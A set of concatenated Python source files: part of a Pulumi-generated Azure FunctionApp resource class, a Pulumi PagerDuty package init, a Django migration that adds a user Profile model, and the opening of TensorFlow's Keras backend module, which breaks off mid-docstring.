* `facebook` (`pulumi.Input[dict]`)
* `app_id` (`pulumi.Input[str]`)
* `app_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `google` (`pulumi.Input[dict]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `issuer` (`pulumi.Input[str]`)
* `microsoft` (`pulumi.Input[dict]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `runtimeVersion` (`pulumi.Input[str]`)
* `tokenRefreshExtensionHours` (`pulumi.Input[float]`)
* `tokenStoreEnabled` (`pulumi.Input[bool]`)
* `twitter` (`pulumi.Input[dict]`)
* `consumerKey` (`pulumi.Input[str]`)
* `consumerSecret` (`pulumi.Input[str]`)
* `unauthenticatedClientAction` (`pulumi.Input[str]`)
The **connection_strings** object supports the following:
* `name` (`pulumi.Input[str]`) - The name of the Connection String.
* `type` (`pulumi.Input[str]`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
* `value` (`pulumi.Input[str]`) - The value for the Connection String.
The **identity** object supports the following:
* `principalId` (`pulumi.Input[str]`) - The Principal ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `tenantId` (`pulumi.Input[str]`) - The Tenant ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `type` (`pulumi.Input[str]`) - Specifies the identity type of the Function App. Possible values include `SystemAssigned`.
The **site_config** object supports the following:
* `alwaysOn` (`pulumi.Input[bool]`) - Should the Function App be loaded at all times? Defaults to `false`.
* `cors` (`pulumi.Input[dict]`) - A `cors` block as defined below.
* `allowedOrigins` (`pulumi.Input[list]`)
* `supportCredentials` (`pulumi.Input[bool]`)
* `ftpsState` (`pulumi.Input[str]`) - State of FTP / FTPS service for this function app. Possible values include: `AllAllowed`, `FtpsOnly` and `Disabled`.
* `http2Enabled` (`pulumi.Input[bool]`) - Specifies whether or not the http2 protocol should be enabled. Defaults to `false`.
* `linuxFxVersion` (`pulumi.Input[str]`) - Linux App Framework and version for the AppService, e.g. `DOCKER|(golang:latest)`.
* `minTlsVersion` (`pulumi.Input[str]`) - The minimum supported TLS version for the function app. Possible values are `1.0`, `1.1`, and `1.2`. Defaults to `1.2` for new function apps.
* `use32BitWorkerProcess` (`pulumi.Input[bool]`) - Should the Function App run in 32 bit mode, rather than 64 bit mode? Defaults to `true`.
* `virtualNetworkName` (`pulumi.Input[str]`) - The name of the Virtual Network which this App Service should be attached to.
* `websocketsEnabled` (`pulumi.Input[bool]`) - Should WebSockets be enabled?
> This content is derived from https://github.com/terraform-providers/terraform-provider-azurerm/blob/master/website/docs/r/function_app.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if app_service_plan_id is None:
raise TypeError("Missing required property 'app_service_plan_id'")
__props__['app_service_plan_id'] = app_service_plan_id
__props__['app_settings'] = app_settings
__props__['auth_settings'] = auth_settings
__props__['client_affinity_enabled'] = client_affinity_enabled
__props__['connection_strings'] = connection_strings
__props__['enable_builtin_logging'] = enable_builtin_logging
__props__['enabled'] = enabled
__props__['https_only'] = https_only
__props__['identity'] = identity
__props__['location'] = location
__props__['name'] = name
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['site_config'] = site_config
if storage_connection_string is None:
raise TypeError("Missing required property 'storage_connection_string'")
__props__['storage_connection_string'] = storage_connection_string
__props__['tags'] = tags
__props__['version'] = version
__props__['default_hostname'] = None
__props__['kind'] = None
__props__['outbound_ip_addresses'] = None
__props__['possible_outbound_ip_addresses'] = None
__props__['site_credential'] = None
super(FunctionApp, __self__).__init__(
'azure:appservice/functionApp:FunctionApp',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, app_service_plan_id=None, app_settings=None, auth_settings=None, client_affinity_enabled=None, connection_strings=None, default_hostname=None, enable_builtin_logging=None, enabled=None, https_only=None, identity=None, kind=None, location=None, name=None, outbound_ip_addresses=None, possible_outbound_ip_addresses=None, resource_group_name=None, site_config=None, site_credential=None, storage_connection_string=None, tags=None, version=None):
"""
Get an existing FunctionApp resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_service_plan_id: The ID of the App Service Plan within which to create this Function App.
:param pulumi.Input[dict] app_settings: A key-value pair of App Settings.
:param pulumi.Input[dict] auth_settings: An `auth_settings` block as defined below.
:param pulumi.Input[bool] client_affinity_enabled: Should the Function App send session affinity cookies, which route client requests in the same session to the same instance?
:param pulumi.Input[list] connection_strings: A `connection_string` block as defined below.
:param pulumi.Input[str] default_hostname: The default hostname associated with the Function App - such as `mysite.azurewebsites.net`
:param pulumi.Input[bool] enable_builtin_logging: Should the built-in logging of this Function App be enabled? Defaults to `true`.
:param pulumi.Input[bool] enabled: Is the Function App enabled?
:param pulumi.Input[bool] https_only: Can the Function App only be accessed via HTTPS? Defaults to `false`.
:param pulumi.Input[dict] identity: An `identity` block as defined below.
:param pulumi.Input[str] kind: The Function App kind - such as `functionapp,linux,container`
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Function App. Changing this forces a new resource to be created.
:param pulumi.Input[str] outbound_ip_addresses: A comma separated list of outbound IP addresses - such as `52.23.25.3,52.143.43.12`
:param pulumi.Input[str] possible_outbound_ip_addresses: A comma separated list of outbound IP addresses - such as `52.23.25.3,52.143.43.12,52.143.43.17` - not all of which are necessarily in use. Superset of `outbound_ip_addresses`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Function App.
:param pulumi.Input[dict] site_config: A `site_config` object as defined below.
:param pulumi.Input[dict] site_credential: A `site_credential` block as defined below, which contains the site-level credentials used to publish to this App Service.
:param pulumi.Input[str] storage_connection_string: The connection string of the backend storage account which will be used by this Function App (such as the dashboard, logs).
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: The runtime version associated with the Function App. Defaults to `~1`.
The **auth_settings** object supports the following:
* `activeDirectory` (`pulumi.Input[dict]`)
* `allowedAudiences` (`pulumi.Input[list]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `additionalLoginParams` (`pulumi.Input[dict]`)
* `allowedExternalRedirectUrls` (`pulumi.Input[list]`)
* `defaultProvider` (`pulumi.Input[str]`)
* `enabled` (`pulumi.Input[bool]`) - Is the Function App enabled?
* `facebook` (`pulumi.Input[dict]`)
* `app_id` (`pulumi.Input[str]`)
* `app_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `google` (`pulumi.Input[dict]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `issuer` (`pulumi.Input[str]`)
* `microsoft` (`pulumi.Input[dict]`)
* `client_id` (`pulumi.Input[str]`)
* `client_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `runtimeVersion` (`pulumi.Input[str]`)
* `tokenRefreshExtensionHours` (`pulumi.Input[float]`)
* `tokenStoreEnabled` (`pulumi.Input[bool]`)
* `twitter` (`pulumi.Input[dict]`)
* `consumerKey` (`pulumi.Input[str]`)
* `consumerSecret` (`pulumi.Input[str]`)
* `unauthenticatedClientAction` (`pulumi.Input[str]`)
The **connection_strings** object supports the following:
* `name` (`pulumi.Input[str]`) - The name of the Connection String.
* `type` (`pulumi.Input[str]`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
* `value` (`pulumi.Input[str]`) - The value for the Connection String.
The **identity** object supports the following:
* `principalId` (`pulumi.Input[str]`) - The Principal ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `tenantId` (`pulumi.Input[str]`) - The Tenant ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `type` (`pulumi.Input[str]`) - Specifies the identity type of the Function App. Possible values include `SystemAssigned`.
The **site_config** object supports the following:
* `alwaysOn` (`pulumi.Input[bool]`) - Should the Function App be loaded at all times? Defaults to `false`.
* `cors` (`pulumi.Input[dict]`) - A `cors` block as defined below.
* `allowedOrigins` (`pulumi.Input[list]`)
* `supportCredentials` (`pulumi.Input[bool]`)
* `ftpsState` (`pulumi.Input[str]`) - State of FTP / FTPS service for this function app. Possible values include: `AllAllowed`, `FtpsOnly` and `Disabled`.
* `http2Enabled` (`pulumi.Input[bool]`) - Specifies whether or not the http2 protocol should be enabled. Defaults to `false`.
* `linuxFxVersion` (`pulumi.Input[str]`) - Linux App Framework and version for the AppService, e.g. `DOCKER|(golang:latest)`.
* `minTlsVersion` (`pulumi.Input[str]`) - The minimum supported TLS version for the function app. Possible values are `1.0`, `1.1`, and `1.2`. Defaults to `1.2` for new function apps.
* `use32BitWorkerProcess` (`pulumi.Input[bool]`) - Should the Function App run in 32 bit mode, rather than 64 bit mode? Defaults to `true`.
* `virtualNetworkName` (`pulumi.Input[str]`) - The name of the Virtual Network which this App Service should be attached to.
* `websocketsEnabled` (`pulumi.Input[bool]`) - Should WebSockets be enabled?
The **site_credential** object supports the following:
* `password` (`pulumi.Input[str]`) - The password associated with the username, which can be used to publish to this App Service.
* `username` (`pulumi.Input[str]`) - The username which can be used to publish to this App Service
> This content is derived from https://github.com/terraform-providers/terraform-provider-azurerm/blob/master/website/docs/r/function_app.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["app_service_plan_id"] = app_service_plan_id
__props__["app_settings"] = app_settings
__props__["auth_settings"] = auth_settings
__props__["client_affinity_enabled"] = client_affinity_enabled
__props__["connection_strings"] = connection_strings
__props__["default_hostname"] = default_hostname
__props__["enable_builtin_logging"] = enable_builtin_logging
__props__["enabled"] = enabled
__props__["https_only"] = https_only
__props__["identity"] = identity
__props__["kind"] = kind
__props__["location"] = location
__props__["name"] = name
__props__["outbound_ip_addresses"] = outbound_ip_addresses
__props__["possible_outbound_ip_addresses"] = possible_outbound_ip_addresses
__props__["resource_group_name"] = resource_group_name
__props__["site_config"] = site_config
__props__["site_credential"] = site_credential
__props__["storage_connection_string"] = storage_connection_string
__props__["tags"] = tags
__props__["version"] = version
return FunctionApp(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import importlib
# Make subpackages available:
__all__ = ['config']
for pkg in __all__:
if pkg != 'config':
importlib.import_module(f'{__name__}.{pkg}')
# Export this package's modules as members:
from .addon import *
from .business_service import *
from .escalation_policy import *
from .event_rule import *
from .extension import *
from .get_business_service import *
from .get_escalation_policy import *
from .get_extension_schema import *
from .get_priority import *
from .get_schedule import *
from .get_service import *
from .get_team import *
from .get_user import *
from .get_vendor import *
from .maintenance_window import *
from .provider import *
from .ruleset import *
from .ruleset_rule import *
from .schedule import *
from .service import *
from .service_dependency import *
from .service_integration import *
from .team import *
from .team_membership import *
from .user import *
from .user_contact_method import *
from .user_notification_rule import *
|
# Generated by Django 3.1.3 on 2020-11-20 20:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default='default.jpg', upload_to='profile_pics')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
# pylint: disable=redefined-outer-name
# pylint: disable=redefined-builtin
"""Keras backend API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import itertools
import json
import os
import threading
import weakref
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session as session_module
from tensorflow.python.distribute import distribute_coordinator as dc
from tensorflow.python.distribute import distribute_coordinator_context as dc_context
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.eager import context
from tensorflow.python.eager import function as eager_function
from tensorflow.python.eager import lift_to_graph
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_module
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend_config
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import ctc_ops as ctc
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gradients as gradients_module
from tensorflow.python.ops import image_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import map_fn as map_fn_lib
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables as variables_module
from tensorflow.python.training import server_lib
from tensorflow.python.util import nest
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import keras_export
py_all = all
py_sum = sum
# INTERNAL UTILS
# The internal graph maintained by Keras and used by the symbolic Keras APIs
# while executing eagerly (such as the functional API for model-building).
_GRAPH = None
# A graph which is used for constructing functions in eager mode.
_CURRENT_SCRATCH_GRAPH = None
# This is a thread local object that will hold the default internal TF session
# used by Keras. It can be set manually via `set_session(sess)`.
_SESSION = threading.local()
# This dictionary holds a mapping {graph: learning_phase}.
# A learning phase is a bool tensor used to run Keras models in
# either train mode (learning_phase == 1) or test mode (learning_phase == 0).
_GRAPH_LEARNING_PHASES = weakref.WeakKeyDictionary()
# _DUMMY_EAGER_GRAPH is used as a key in _GRAPH_LEARNING_PHASES.
# We keep a separate reference to it to make sure it does not get removed from
# _GRAPH_LEARNING_PHASES.
_DUMMY_EAGER_GRAPH = threading.local()
# This boolean flag can be set to True to leave variable initialization
# up to the user.
# Change its value via `manual_variable_initialization(value)`.
_MANUAL_VAR_INIT = False
# This list holds the available devices.
# It is populated when `_get_available_gpus()` is called for the first time.
# We assume our devices don't change henceforth.
_LOCAL_DEVICES = None
# This dictionary holds a mapping between a graph and variables to initialize
# in the graph.
_GRAPH_VARIABLES = weakref.WeakKeyDictionary()
# This dictionary holds a mapping between a graph and TF optimizers created in
# the graph.
_GRAPH_TF_OPTIMIZERS = weakref.WeakKeyDictionary()
# The below functions are kept accessible from backend for compatibility.
epsilon = backend_config.epsilon
floatx = backend_config.floatx
image_data_format = backend_config.image_data_format
set_epsilon = backend_config.set_epsilon
set_floatx = backend_config.set_floatx
set_image_data_format = backend_config.set_image_data_format
@keras_export('keras.backend.backend')
def backend():
"""Publicly accessible method for determining the current backend.
Only exists for API compatibility with multi-backend Keras.
Returns:
The string "tensorflow".
"""
return 'tensorflow'
@keras_export('keras.backend.cast_to_floatx')
def cast_to_floatx(x):
"""Cast a Numpy array to the default Keras float type.
Arguments:
x: Numpy array.
Returns:
The same Numpy array, cast to its new type.
Example:
```python
>>> from keras import backend as K
>>> K.floatx()
'float32'
>>> arr = numpy.array([1.0, 2.0], dtype='float64')
>>> arr.dtype
dtype('float64')
>>> new_arr = K.cast_to_floatx(arr)
>>> new_arr
array([ 1., 2.], dtype=float32)
>>> new_arr.dtype
dtype('float32')
```
"""
return np.asarray(x, dtype=floatx())
# A global dictionary mapping graph objects to an index of counters used
# for various layer names in each graph.
# This allows giving unique autogenerated names to layers, in a graph-specific way.
PER_GRAPH_LAYER_NAME_UIDS = weakref.WeakKeyDictionary()
@keras_export('keras.backend.get_uid')
def get_uid(prefix=''):
"""Associates a string prefix with an integer counter in a TensorFlow graph.
Arguments:
prefix: String prefix to index.
Returns:
Unique integer ID.
Example:
```
>>> get_uid('dense')
1
>>> get_uid('dense')
2
```
"""
graph = get_graph()
if graph not in PER_GRAPH_LAYER_NAME_UIDS:
PER_GRAPH_LAYER_NAME_UIDS[graph] = collections.defaultdict(int)
layer_name_uids = PER_GRAPH_LAYER_NAME_UIDS[graph]
layer_name_uids[prefix] += 1
return layer_name_uids[prefix]
@keras_export('keras.backend.reset_uids')
def reset_uids():
"""Resets graph identifiers.
"""
per_graph_layer_name_uids = PER_GRAPH_LAYER_NAME_UIDS
keys = list(per_graph_layer_name_uids.keys())
for key in keys:
del per_graph_layer_name_uids[key]
@keras_export('keras.backend.clear_session')
def clear_session():
"""Destroys the current TF graph and creates a new one.
Useful to avoid clutter from old models / layers.
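Example (illustrative):
```python
>>> from keras import backend as K
>>> K.get_uid('dense')   # layer-name counters accumulate per graph
1
>>> K.clear_session()    # destroys the graph and resets the counters
>>> K.get_uid('dense')
1
```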
"""
global _SESSION
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
global _GRAPH_VARIABLES # pylint: disable=global-variable-not-assigned
global _GRAPH_TF_OPTIMIZERS # pylint: disable=global-variable-not-assigned
ops.reset_default_graph()
reset_uids()
_SESSION.session = None
graph = get_graph()
with graph.as_default():
with ops.name_scope(''):
phase = array_ops.placeholder_with_default(
False, shape=(), name='keras_learning_phase')
_GRAPH_LEARNING_PHASES = {}
_GRAPH_LEARNING_PHASES[graph] = phase
_GRAPH_VARIABLES.pop(graph, None)
_GRAPH_TF_OPTIMIZERS.pop(graph, None)
@keras_export('keras.backend.manual_variable_initialization')
def manual_variable_initialization(value):
"""Sets the manual variable initialization flag.
This boolean flag determines whether
variables should be initialized
as they are instantiated (default), or if
the user should handle the initialization
(e.g. via `tf.initialize_all_variables()`).
Arguments:
value: Python boolean.
"""
global _MANUAL_VAR_INIT
_MANUAL_VAR_INIT = value
@keras_export('keras.backend.learning_phase')
def learning_phase():
"""Returns the learning phase flag.
The learning phase flag is a bool tensor (0 = test, 1 = train)
to be passed as input to any Keras function
that uses a different behavior at train time and test time.
Returns:
Learning phase (scalar integer tensor or Python integer).
"""
if ops.get_default_graph() is _GRAPH:
# Don't enter an init_scope for the learning phase if eager execution
# is enabled but we're inside the Keras workspace graph.
return symbolic_learning_phase()
with ops.init_scope():
# We always check & set the learning phase inside the init_scope,
# otherwise the wrong default_graph will be used to look up the learning
# phase inside of functions & defuns.
#
# This is because functions & defuns (both in graph & in eager mode)
# will always execute non-eagerly using a function-specific default
# subgraph.
if context.executing_eagerly():
if _DUMMY_EAGER_GRAPH not in _GRAPH_LEARNING_PHASES:
# Fallback to inference mode as default.
return 0
return _GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH]
return symbolic_learning_phase()
def symbolic_learning_phase():
graph = get_graph()
with graph.as_default():
if graph not in _GRAPH_LEARNING_PHASES:
with ops.name_scope(''):
phase = array_ops.placeholder_with_default(
False, shape=(), name='keras_learning_phase')
_GRAPH_LEARNING_PHASES[graph] = phase
return _GRAPH_LEARNING_PHASES[graph]
@keras_export('keras.backend.set_learning_phase')
def set_learning_phase(value):
"""Sets the learning phase to a fixed value.
Arguments:
value: Learning phase value, either 0 or 1 (integers).
Raises:
ValueError: if `value` is neither `0` nor `1`.
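Example (illustrative):
```python
>>> from keras import backend as K
>>> K.set_learning_phase(1)  # force training-mode behavior (e.g. dropout is active)
>>> K.learning_phase()
1
```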
"""
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
if value not in {0, 1}:
raise ValueError('Expected learning phase to be 0 or 1.')
with ops.init_scope():
if context.executing_eagerly():
# In an eager context, the learning phase value applies to both the eager
# context and the internal Keras graph.
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = value
_GRAPH_LEARNING_PHASES[get_graph()] = value
def set_eager_learning_phase(value):
"""Internal utility that sets the learning phase in eager execution only.
Arguments:
value: Learning phase value, either 0 or 1 (integers).
"""
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
assert value in {0, 1}
assert context.executing_eagerly()
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = value
@keras_export('keras.backend.learning_phase_scope')
@tf_contextlib.contextmanager
def learning_phase_scope(value):
"""Provides a scope within which the learning phase is equal to `value`.
The learning phase gets restored to its original value upon exiting the scope.
Arguments:
value: Learning phase value, either 0 or 1 (integers).
Yields:
None.
Raises:
ValueError: if `value` is neither `0` nor `1`.
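Example (illustrative):
```python
>>> from keras import backend as K
>>> K.set_learning_phase(0)
>>> with K.learning_phase_scope(1):
...     print(K.learning_phase())  # train mode inside the scope
1
>>> K.learning_phase()  # restored on exit
0
```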
"""
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
if value not in {0, 1}:
raise ValueError('Expected learning phase to be 0 or 1.')
with ops.init_scope():
if context.executing_eagerly():
previous_eager_value = _GRAPH_LEARNING_PHASES.get(
_DUMMY_EAGER_GRAPH, None)
previous_graph_value = _GRAPH_LEARNING_PHASES.get(get_graph(), None)
try:
set_learning_phase(value)
yield
finally:
# Restore learning phase to initial value.
with ops.init_scope():
if context.executing_eagerly():
if previous_eager_value is not None:
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = previous_eager_value
elif _DUMMY_EAGER_GRAPH in _GRAPH_LEARNING_PHASES:
del _GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH]
graph = get_graph()
if previous_graph_value is not None:
_GRAPH_LEARNING_PHASES[graph] = previous_graph_value
elif graph in _GRAPH_LEARNING_PHASES:
del _GRAPH_LEARNING_PHASES[graph]
@tf_contextlib.contextmanager
def eager_learning_phase_scope(value):
"""Internal scope that sets the learning phase in eager execution only.
Arguments:
value: Learning phase value, either 0 or 1 (integers).
Yields:
None.
Raises:
ValueError: if `value` is neither `0` nor `1`.
"""
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
assert value in {0, 1}
assert context.executing_eagerly()
previous_value = learning_phase()
try:
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = value
yield
finally:
# Restore learning phase to initial value.
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = previous_value
def _current_graph(op_input_list):
"""Return the graph members of `op_input_list`, or the current graph."""
return ops._get_graph_from_inputs(op_input_list)
def _get_session(op_input_list=()):
"""Returns the session object for the current thread."""
global _SESSION
default_session = ops.get_default_session()
if default_session is not None:
session = default_session
else:
if ops.inside_function():
raise RuntimeError('Cannot get session inside Tensorflow graph function.')
# If we don't have a session, or that session does not match the current
# graph, create and cache a new session.
if (getattr(_SESSION, 'session', None) is None or
_SESSION.session.graph is not _current_graph(op_input_list)):
# If we are creating the Session inside a tf.distribute.Strategy scope,
# we ask the strategy for the right session options to use.
if distribution_strategy_context.has_strategy():
configure_and_create_distributed_session(
distribution_strategy_context.get_strategy())
else:
_SESSION.session = session_module.Session(
config=get_default_session_config())
session = _SESSION.session
return session
@keras_export(v1=['keras.backend.get_session'])
def get_session(op_input_list=()):
"""Returns the TF session to be used by the backend.
If a default TensorFlow session is available, we will return it.
Else, we will return the global Keras session assuming it matches
the current graph.
If no global Keras session exists at this point,
we will create a new global session.
Note that you can manually set the global session
via `K.set_session(sess)`.
Arguments:
op_input_list: An optional sequence of tensors or ops, which will be used
to determine the current graph. Otherwise the default graph will be
used.
Returns:
A TensorFlow session.
"""
session = _get_session(op_input_list)
if not _MANUAL_VAR_INIT:
with session.graph.as_default():
_initialize_variables(session)
return session
def get_graph():
if context.executing_eagerly():
global _GRAPH
if _GRAPH is None:
_GRAPH = func_graph.FuncGraph('keras_graph')
return _GRAPH
else:
return ops.get_default_graph()
@tf_contextlib.contextmanager
def _scratch_graph(graph=None):
"""Retrieve a shared and temporary func graph.
The eager execution path lifts a subgraph from the keras global graph into
a scratch graph in order to create a function. DistributionStrategies, in
turn, constructs multiple functions as well as a final combined function. In
order for that logic to work correctly, all of the functions need to be
created on the same scratch FuncGraph.
Args:
graph: A graph to be used as the current scratch graph. If not set then
a scratch graph will either be retrieved or created.
Yields:
The current scratch graph.
"""
global _CURRENT_SCRATCH_GRAPH
if (_CURRENT_SCRATCH_GRAPH is not None and graph is not None and
_CURRENT_SCRATCH_GRAPH is not graph):
raise ValueError('Multiple scratch graphs specified.')
if _CURRENT_SCRATCH_GRAPH:
yield _CURRENT_SCRATCH_GRAPH
return
graph = graph or func_graph.FuncGraph('keras_scratch_graph')
try:
_CURRENT_SCRATCH_GRAPH = graph
yield graph
finally:
_CURRENT_SCRATCH_GRAPH = None
@keras_export('keras.backend.set_session')
def set_session(session):
"""Sets the global TensorFlow session.
Arguments:
session: A TF Session.
"""
global _SESSION
_SESSION.session = session
def get_default_session_config():
if not os.environ.get('OMP_NUM_THREADS'):
config = config_pb2.ConfigProto(allow_soft_placement=True)
else:
num_thread = int(os.environ.get('OMP_NUM_THREADS'))
config = config_pb2.ConfigProto(
intra_op_parallelism_threads=num_thread,
inter_op_parallelism_threads=num_thread,
allow_soft_placement=True)
return config
# DEVICE MANIPULATION
class _TfDeviceCaptureOp(object):
"""Class for capturing the TF device scope."""
def __init__(self):
self.device = None
def _set_device(self, device):
"""This method captures TF's explicit device scope setting."""
self.device = device
def _get_current_tf_device():
"""Return explicit device of current context, otherwise returns `None`.
Returns:
If the current device scope is explicitly set, it returns a string with
the device (`CPU` or `GPU`). If the scope is not explicitly set, it will
return `None`.
"""
graph = get_graph()
op = _TfDeviceCaptureOp()
graph._apply_device_functions(op)
return op.device
def _is_current_explicit_device(device_type):
"""Check if the current device is explicitly set on the device type specified.
Arguments:
device_type: A string containing `GPU` or `CPU` (case-insensitive).
Returns:
A boolean indicating if the current device scope is explicitly set on the
device type.
Raises:
ValueError: If the `device_type` string indicates an unsupported device.
"""
device_type = device_type.upper()
if device_type not in ['CPU', 'GPU']:
raise ValueError('`device_type` should be either "CPU" or "GPU".')
device = _get_current_tf_device()
return device is not None and device.device_type == device_type.upper()
def _get_available_gpus():
"""Get a list of available gpu devices (formatted as strings).
Returns:
A list of available GPU devices.
"""
if ops.executing_eagerly_outside_functions():
# Returns names of devices directly.
return [name for name in context.list_devices() if 'GPU' in name]
global _LOCAL_DEVICES
if _LOCAL_DEVICES is None:
_LOCAL_DEVICES = get_session().list_devices()
return [x.name for x in _LOCAL_DEVICES if x.device_type == 'GPU']
def _has_nchw_support():
"""Check whether the current scope supports NCHW ops.
TensorFlow does not support NCHW on CPU. Therefore we check that we are not
explicitly placed on the CPU and that GPUs are available; in that case ops
will be soft-placed on the GPU device.
Returns:
bool: whether the current scope's device placement supports NCHW
"""
explicitly_on_cpu = _is_current_explicit_device('CPU')
gpus_available = bool(_get_available_gpus())
return not explicitly_on_cpu and gpus_available
# VARIABLE MANIPULATION
def _constant_to_tensor(x, dtype):
"""Convert the input `x` to a tensor of type `dtype`.
This is slightly faster than the _to_tensor function, at the cost of
handling fewer cases.
Arguments:
x: An object to be converted (numpy arrays, floats, ints and lists of
them).
dtype: The destination type.
Returns:
A tensor.
"""
return constant_op.constant(x, dtype=dtype)
def _to_tensor(x, dtype):
"""Convert the input `x` to a tensor of type `dtype`.
Arguments:
x: An object to be converted (numpy array, list, tensors).
dtype: The destination type.
Returns:
A tensor.
"""
return ops.convert_to_tensor(x, dtype=dtype)
@keras_export('keras.backend.is_sparse')
def is_sparse(tensor):
"""Returns whether a tensor is a sparse tensor.
Arguments:
tensor: A tensor instance.
Returns:
A boolean.
Example:
```python
>>> from keras import backend as K
>>> a = K.placeholder((2, 2), sparse=False)
>>> print(K.is_sparse(a))
False
>>> b = K.placeholder((2, 2), sparse=True)
>>> print(K.is_sparse(b))
True
```
"""
return isinstance(tensor, sparse_tensor.SparseTensor)
@keras_export('keras.backend.to_dense')
def to_dense(tensor):
"""Converts a sparse tensor into a dense tensor and returns it.
Arguments:
tensor: A tensor instance (potentially sparse).
Returns:
A dense tensor.
Examples:
```python
>>> from keras import backend as K
